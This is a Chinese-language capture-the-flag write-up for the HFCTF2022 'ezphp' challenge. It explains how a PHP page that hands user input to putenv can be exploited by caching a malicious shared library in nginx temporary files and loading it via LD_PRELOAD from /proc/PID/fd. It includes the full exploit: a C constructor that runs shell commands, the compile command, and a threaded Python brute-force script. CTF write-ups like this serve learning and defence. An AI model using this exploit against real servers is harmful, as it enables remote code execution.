HFCTF2022 ezphp
文章目录
题目上去给了代码
<?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?>
这个题目本来以为考点是p佬的文章,但是不是这样的。
p佬文章:我是如何利用环境变量注入执行任意命令
这个题目的考点是Nginx 在后端 Fastcgi 响应过大 或 请求正文 body 过大时会产生临时文件。如果打开一个进程打开了某个文件,某个文件就会出现在 /proc/PID/fd/ 目录下,我们可以通过重复发包so造成文件缓存,然后用LD_PRELOAD去加载我们这个动态链接库
当nginx接收来自fastcgi的响应时,若大小超过限定值不适合以内存的形式来存储的时候,一部分就会以临时文件的形式保存到磁盘上。
所以我们的exp.so需要加上一些无用数据让整个文件稍大。
具体可以参考hxp CTF 2021 跳跳糖社区
exp.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
__attribute__ ((__constructor__)) void preload (void){
unsetenv("LD_PRELOAD");
system("id");
system("cat /flag > /var/www/html/flag");
编译为so文件
gcc -shared -fPIC exp.c -o exp.so
然后放在python脚本同目录下,脚本参考唯独你没懂战队
的wp
唯独你没懂战队的wp
exp.py
import threading, requests
URL2 = f'http://192.168.56.5:7005/index.php'
nginx_workers = [12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]
done = False
def uploader():
print('[+] starting uploader')
with open("exp.so","rb") as f:
data1 = f.read()+b'0'*1024*1000
#print(data1)
while not done:
requests.get(URL2, data=data1)
for _ in range(16):
t = threading.Thread(target=uploader)
t.start()
def bruter(pid):
global done
while not done:
print(f'[+] brute loop restarted: {pid}')
for fd in range(4, 32):
try:
requests.get(URL2, params={
'env': f"LD_PRELOAD=/proc/{pid}/fd/{fd}"
})
except:
pass
for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
本来是在vps上测试的,没通。。然后在buu测试,没有通。。。经常返回429。
最后在本地部署docker环境打通了,flag为自己定义的